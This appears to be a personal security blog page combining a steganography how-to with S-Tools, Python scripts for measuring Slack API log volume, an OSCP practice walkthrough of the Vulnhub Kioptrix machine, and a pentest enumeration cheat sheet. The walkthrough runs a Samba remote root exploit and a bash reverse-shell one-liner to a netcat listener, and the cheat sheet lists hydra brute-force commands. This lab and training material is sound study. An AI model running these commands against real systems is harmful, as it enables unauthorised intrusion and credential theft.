Hiding in plain sight

Steganography is about hiding content inside other content.

At work, bad folk might use it to sneak things outside the company, or just to hide bad things on their machine.

They probably won’t though, because it’s a lot of effort and there are other ways to steal data.

or will they…

This week I needed to look at some sneaky files in the context of digital forensics.

I thought the topic was interesting enough that I should jot down the key points.

Before I do, I should mention that there are much better articles covering the topic in detail. You should try these two if you want to learn a lot more:

  • http://www.garykessler.net/library/steganography.html
  • http://www.garykessler.net/library/fsc_stego.html

The only aim of this post is to capture a practical way to mess about with this stuff for yourself.

I will  just mention one key theory point first though:

When someone is using Steganography to hide something else inside a file, you’d expect that the files would be bigger,. That’s possible, but its often not the case. One common approach (built into free tools) is to take the file you are hiding and distribute the bits among sets of bytes in the host file. (The number of bytes does not change, just some of the bits in collections of bytes). If the bad guy is able to modify the least significant bit of some bytes in a .bmp file, for example, the file will not grow and the difference to the color palette in the image will be barely noticeable if the right image is used.

Step 1: Download S-Tools. Its free and you can find it in lots of other places if downloading it from here seems weird. (I don’t blame you if you don’t trust my download, I wouldn’t trust a random file from a blog either).

Step 2: Find a carrier file and drag it into S-Tools. I chose this cow, no one ever suspects the cow. (note that s-tools tells me how much stuff this cow could stash).

Step 3: Drag the file you need to hide onto the file you are hiding it in (in s-tools). You will be prompted for a passphrase to further protect the secret file.

Step 4: Save the new file (by right clicking on the “hidden data” version and choosing “save as”).

I called mine just_a_cow.bmp when i saved it so that no one would think to examine it more carefully.

(notice the file size – same; also notice the image quality – modifying a few bits inside sets of bytes of the original means that there is no real noticeable difference from the original)

You can download the file containing the secret file from here: just_a_cow.bmp if you’d like to examine it for yourself. The password on the secret file inside the cow is “duck”.

To examine a file like just_a_cow.bmp, you just do the same thing as hiding stuff. Open s-tools, drag in the file, then right click the file to reveal the content. You should find some super secret tips inside that just_a_cow.bmp file if you are interested.

Cheeky buggers.


I’m tweaking the collection of data relating to activities inside our corporate Slack team. I was particularly interested in volume, for example, if someone asked us to capture the metadata associated with every reaction to a Slack message with the party parrot, how much storage (and processing power) would I need to budget on the corporate log management platform?

I should mention before i start to blab, that there are probably great commercial products to do this kind of work, and if you are short on time you should look into them. However, if you set aside an afternoon to mess about with a tiny amount of code, and a whole heap of JSON you’ll have a lot more fun.

The first thing to know is that most (maybe all?) the Slack API messages are delivered as JSON.

An event record that captures a reaction would look like this when the API serves it up:

The second thing to consider is that for my use case (determining data volume) there are a couple of good avenues to pursue.

  1. Use the events API. You subscribe to the events that you care about, and Slack serves them up as they happen.
  2. Use the team.accesslogs HTTP-RPC endpoint. You ask Slack for a date range, and Slack will tell you all the folk who logged in that day.

Events API:

For the events API, there was a really great tutorial available. The tutorial is easy to follow and will get you up and running fast. It covers everything from choosing the events you are interested in (the ones you want your application to ‘subscribe’ to), all the way to setting up a reverse proxy with ngrok (don’t worry, its a one line command) so that your application can receive events while it is running on your laptop.

Once I had the tutorial up and running, the only tinkering I needed to do was to adjust the routes that I cared about. As an example, while I was looking at reactions to Slack messages my example.py file looked like this:

from slackeventsapi import SlackEventAdapter
from slackclient import SlackClient
import json
import os
import pprint

slack_events_adapter = SlackEventAdapter(SLACK_VERIFICATION_TOKEN, “/slack/events”)


total_size = 0

def display_total(size):
    print “——————————————-“
    print size, ” bytes sent from slack events so far”
    print “(“, size / 1024 / 1024, ” MB so far)”
    print “——————————————-“

def channel_created(event_data):
    global total_size
    json_obj = json.dumps(event_data)
    json_size = len(json_obj)
    total_size = total_size + json_size
    print “The size of this object is: “, len(json_obj)
    pp = pprint.PrettyPrinter(indent=4)


live event subscription for ‘reactions’ to messages in Slack. We used variations on the code above to measure the volume over a period of time as well as the processing required to handle this at scale.
Example of the ngrok tunnel allowing Slack to deliver messages from out on the internet to the application running on my laptop.

With all the awesome work the Slack developer evangelists did with that tutorial, variations on the model above was about all I needed to measure event subscription volume and get a really good idea how much it would cost to include various slack events in our central log platform. (FWIW – we don’t really care about message reactions, just an example).

The team.accesslogs HTTP-RPC endpoint:

Flipping it around a little, Slack also offers the traditional HTTPS-RPC endpoints that allow us to ask the questions, rather than slack tapping us on the shoulder when stuff happens.

The team.accesslogs method is the one that gives us information about who logged in, where, when and from what device. Its not a stretch to imagine that this is an interesting endpoint for most security teams. The data you get back from Slack about this one looks like this:

    “user_id”: “U12345”,
    “username”: “bob”,
    “date_first”: 1422922864,
    “date_last”: 1422922864,
    “count”: 1,
    “ip”: “”,
    “user_agent”: “SlackWeb Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_10_2)       AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/41.0.2272.35     Safari\/537.36”,
    “isp”: “BigCo ISP”,
    “country”: “US”,
    “region”: “CA”

I have the same goal in mind with this endpoint. If i want to store this stuff, I need to know how many events like this we generate per day (on average).

Slack authorization tokens for this type of thing can be retrieved from here. (They can be revoked from here by going to “tester” and issuing the sample API call to kill the token for your team).

Once I had a token, I settled with some skeleton code that looked like this:

import json
import requests
import time

url = “https://slack.com/api/”
method = “team.accessLogs”
token = “{your token here}”
pretty = 1
page = 1

total_size = 0

for _ in range(100):

    payload = {‘token’: token, ‘pretty’: pretty, “page”:page}
    r = requests.get(url + method , params=payload)
    json_version = r.json()
    response_size = len(json_version)
    total_size = total_size + response_size
    print “Size: ” + str(response_size)
    for event in json_version[“logins”]:
        print “Name: ” + str(event[“username”])
        print “IP: ” + str(event[“ip”])
        formatted_time = time.strftime(‘%Y-%m-%d %H:%M:%S’, time.localtime(event[“date_last”]))
        print “Date: ” + str(formatted_time)
        print “”

    page = page + 1

print “Total Size: ” + str(total_size)

Nothing really special there, but hopefully the template will save someone a little time getting up and running quickly. Variations on this allowed me to narrow things down and get to the information that was most important for our security program. We started adding code to bucket the volume by days, we looked at filtering various things, we also took some measurements to understand how often we would need to pull from the endpoint to get an efficient next set of data each time. We were able to project the average data volume that tracking this type of event would add, and also make some assumptions about the rate of growth over time.

All in all, a good detour slightly off the typical Thursday afternoon and we have a good understanding of how much extra space and processing we need to add Slack data to our logging systems.

OSCP practice: Vulnhub – Kioptrix Level 1

My OSCP exam is fast approaching. For extra practice I am going to start working through the relevant vulnhub machines.

A list of vulnhub machines that are more like OSCP here.

Starting right at the beginning with: Kioptrix Level 1

I used the free vmware workstation edition and created a new private network. I moved my Kali machine and Kioptrix into that network. (I also have a basic DHCP/DNS server in there).

Starting with a scan to find the machine:

netdiscover -r

Nmap scan of our discovered target:

nmap -p- -sV -sS -T4 -A

22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open  status      1 (RPC #100024)

We seem to have:
Open SSH 2.9
RPC & SMB (via Samba)

Starting a quick scan of the HTTP and SMB ports via dirb and enum4linux to build out the list of possible attack surfaces:


The most interesting thing in the scan is the version of Samba.

The latest on the Samba site is 4.7.0. The version on this server is 2.2.1a which looks really old. Looking at the Samba site, this version was from 2001 and was designed with Windows 2000 enhancements in mind.


Quick manual check of the interesting pages:

At this point we have a handful of attack surfaces to explore:

  • Old Samba (2.2.1)
  • Old’ish Apache (Apache httpd 1.3.20)
  • Webalizer 2.01

The really old samba is particularly interesting, starting there:

searchsploit samba 2.2

Remote root exploit sounds perfect, inspecting the code to see if there is manual work to do. It seems to be ready to do.

Compiled with: gcc 10.c -o sambaexploit

Execute with: ./sambaexploit -b 0 -v

It seems to have worked. We dont have an interactive shell (tried an ls command), but we appear to be able to execute commands.

Set up a local listener: nc -nlvp 443

Execute reverse shell via the exploit prompt: bash -i >& /dev/tcp/ 0>&1

Success – interactive reverse shell (as root):


Hashcat password cracking quick start:

  1. Download from here.
  2. Install on Windows machine.
  3. Search the example hashes to find the code matching the hash you located.
  4. hashcat64 -m {code} {path to the hash you found} {path to your password file} –force
  5. Example command: hashcat64 -m 1600 c:\Users\cd\Desktop\hashes.txt c:\Users\cd\Desktop\rockyou.txt –force

Every Pen-Test: Enumeration Reminders


dirb http://site.com {wordlist-optional}

/usr/share/dirb/wordlists /usr/share/dirb/wordlists/vulns
eg: /usr/share/dirb/wordlists/vulns/coldfusion.txt

nikto -h

if wordpress:

General connection enumeration:
nc 80 (then)

For SSL:
openssl s_client -quiet -connect site.com:443

davtest -cleanup -url
cadaver (webdav client)


Zone transfer:

dig server.domain.com domain.com axfr


nmap -sV -Pn -vv -p 21 –script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -oN ‘ftp.nmap’

hydra -L wordlists/user_list -P wordlists/pass_list -f -o ftpTests.txt -u -s 21 ftp



nbtscan -r


nmap -vv -sV -Pn -p 25,465,587 –script=smtp-vuln*



snmpwalk -c public -v1 1 > snmpwalk.txt

nmap -vv -sV -sU -Pn -p 161,162 –script=snmp-netstat,snmp-processes


hydra -L wordlists/user_list -P wordlists/pass_list -f -o sshTest.txt -u -s 22 ssh


epdump example.com


(linux) rpcinfo -p


nmbscan -a


rpcinfo -p host

SIPDump, SIPCrack

The archive

A big list of things from the past:


Microsoft Tech-Ed: Windows Server 2012 Direct Access


XPERF Windows boot tracing

Identifying accounts with Kerberos Pre-Authentication disabled

Direct Access: when you make it work, then its stops

Tricking your Windows test machines to think they are connected to the internet

“Real World” Direct Access

Un-Host and Re-Host Active Directory partitions

Granular AD Replication scenarios – Advanced Troubleshooting

Network tracing without installing anything (ETL)

Active Directory: Change notification, and you.

Kerberos Troubleshooting

Windows Debugger: Beware verifier settings

Quick and nasty 1000 users via Powershell

Locating the Inter-Site Topology Generators

Dumping the Active Directory Database

Windows Auditing in 2008 and above

Testing the DCLocator function

Multiple Read Only Domain Controllers in a single site?

Active Directory: Adding attributes to the filtered attribute set

Troubleshooting ports with portqry.exe

Group policy Notes

Kerberos Delegation

Kerberos Notes

Domain controller is slow to start “Preparing Network Connections”